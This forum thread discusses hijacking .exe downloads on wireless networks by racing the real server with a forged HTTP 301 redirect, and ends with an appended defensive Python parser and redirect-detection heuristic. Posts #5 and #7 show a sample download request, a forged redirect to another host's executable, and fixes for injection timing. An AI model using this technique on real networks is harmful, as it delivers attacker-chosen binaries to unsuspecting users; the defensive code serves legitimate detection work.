Thread: replacing .exe on a broadcast network

  1. #1
    Junior Member (Join Date: May 2008, Posts: 35)
    Subject: replacing .exe on a broadcast network

    Does anyone have any knowledge regarding replacing a .exe file request on a broadcast network by exploiting a race condition? From what I understand at the moment, one can sniff network traffic and, on finding "content-type:application" as a request, respond to it with his own binary file. I think this would be even cooler than using ettercap filters and injecting code on the fly into an HTML page.

    If this is possible it can also lead to a whole new kind of injection attack in an 802.11 network, where an attacker can send data to the victim without even being associated to the AP.

  2. #2
    Just burned his ISO (Join Date: Mar 2010, Posts: 5)

    I believe this is called header injection.

    h**p://rturf.net/documentum/?View=entry&EntryID=272

    Another:

    h**p://i8jesus.com/?p=18

  3. #3
    Junior Member (Join Date: May 2008, Posts: 35)

    Thanks a lot, it looks like an HTTP 301 response is the best thing to do; I have even seen an ettercap filter doing the same. Will try to implement this using scapy on a wifi network. Now I must sit and start reading up on TCP to understand how the sequence numbers and ack numbers work and how the checksum is calculated...

    There is another way of accomplishing this: we can write a customised TCP stack which should race and respond to the GET request, but the problem is this might become too complicated, since I am trying to do it using packet injection for an 802.11 network without being associated to the AP, and I don't know how to handle and send executable files in packets... although I would like to learn about it. Anybody who could shed some light on this topic or point me to some interesting article would be great... any suggestions or alternative ways of doing this will also be greatly appreciated.

  4. #4
    Jenkem Addict, imported_wyze (Join Date: Jul 2007, Posts: 1,543)

    Quote Originally Posted by Cryptid:
        There is another way of accomplishing this: we can write a customised TCP stack which should race and respond to the GET request, but the problem is this might become too complicated, since I am trying to do it using packet injection for an 802.11 network without being associated to the AP, and I don't know how to handle and send executable files in packets... although I would like to learn about it. Anybody who could shed some light on this topic or point me to some interesting article would be great... any suggestions or alternative ways of doing this will also be greatly appreciated.
    Wifitap, which uses scapy, might have some keys to the puzzle.
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Junior Member (Join Date: May 2008, Posts: 35)

    Alright, I have achieved some progress but I'm stuck again.

    When a GET request is being made, say
    Code:
    GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1
    Host: the.earth.li

    I am replying back with a 301 response as such:

    Code:
    HTTP/1.1 301 Moved Permanently
    Location: http://spool.metasploit.com/releases/framework-3.2.exe

    but the result is turning out to be a request made to

    Code:
    /releases/framework-3.2.exerth.li/~sgtatham/putty/latest/x86/putty.exe

    Can anyone point out to me what I am doing wrong?

  6. #6
    Jenkem Addict, imported_wyze (Join Date: Jul 2007, Posts: 1,543)

    What tool are you using to do this?

    One thing Mister_X kindly shed some light on was that airpwn _should_ actually be able to do this out of the box. Unfortunately, I've never got airpwn to work right with mac80211 (even though it's "supported"). I'll try a test with my rt73 card soon and see if it will work in this scenario.
    dd if=/dev/swc666 of=/dev/wyze

  7. #7
    Junior Member (Join Date: May 2008, Posts: 35)

    The problem was that the 301 response had to end with a \r\n, which was missing; that is why the problem occurred. Now it's working, but there is another problem: the race condition is effectively being exploited only the first time, since generating the first response induces some amount of latency in the program, and all the other GET requests are being retrieved from a buffer that have already been serviced by the authentic source, so no race condition exists any more because the program becomes slow and loses the race... any help with the program will be greatly appreciated.

    At the moment the only solution I can think of is to somehow flush the buffer and start the sniffer again... or somehow get the sniffer to stop sniffing while the program is injecting the packet.

    By the way, I am using scapy.

    Even I faced the same problem with airpwn for some time, but later on figured out that running airodump using "-c" on the same channel as the victim network gets airpwn to correctly inject the data.
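A defender-side check, added here as an example and not code from the thread or from any tool named in it: a strict HTTP response-head parser that refuses to interpret a head lacking the blank-line (CRLF CRLF) terminator discussed in posts #5 and #7, plus a monitoring heuristic (my assumption, not something the thread states) that flags a 3xx redirect sending an executable download to a host other than the one requested. The sample bytes reuse the request and response shown in post #5 and are constructed inline.

```python
# Added example (not from the thread): strict HTTP response-head parsing and a
# monitor-side heuristic for executable downloads redirected off-host.
import re
from urllib.parse import urlparse

CRLF = b"\r\n"

# Constructed samples, mirroring the request/response shown in post #5.
REQUEST_HOST = "the.earth.li"
REQUEST_PATH = "/~sgtatham/putty/latest/x86/putty.exe"
UNTERMINATED_301 = (b"HTTP/1.1 301 Moved Permanently\r\n"
                    b"Location: http://spool.metasploit.com/releases/framework-3.2.exe")
COMPLETE_301 = UNTERMINATED_301 + CRLF + CRLF   # head ends with the empty line

def parse_response_head(raw: bytes):
    """Return (status, headers), or None while the head is incomplete: an
    HTTP/1.x head ends at the empty line (CRLF CRLF), and a client that has
    seen fewer bytes must keep reading rather than act on a partial head."""
    end = raw.find(CRLF + CRLF)
    if end < 0:
        return None
    lines = raw[:end].split(CRLF)
    m = re.match(rb"HTTP/1\.[01] (\d{3})(?: |$)", lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        key = name.strip().lower().decode("ascii", "replace")
        headers[key] = value.strip().decode("ascii", "replace")
    return int(m.group(1)), headers

def redirected_executable(request_host: str, request_path: str, raw_response: bytes):
    """Describe why this pair deserves a look, or None. Heuristic (my
    assumption, not a rule from the thread): an .exe/.msi download redirected
    to another host is worth alerting on; CDN hand-offs trip it too."""
    parsed = parse_response_head(raw_response)
    if parsed is None:
        return "incomplete response head (no CRLF CRLF terminator)"
    status, headers = parsed
    if status not in (301, 302, 303, 307, 308) or "location" not in headers:
        return None
    if not request_path.lower().endswith((".exe", ".msi")):
        return None
    target = urlparse(headers["location"]).hostname
    if target and target.lower() != request_host.lower():
        return f"{request_path} on {request_host} redirected to {target}"
    return None
```

Hits from the heuristic are leads for a wireless or proxy monitor to review, not verdicts, since legitimate download mirrors also redirect across hosts.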
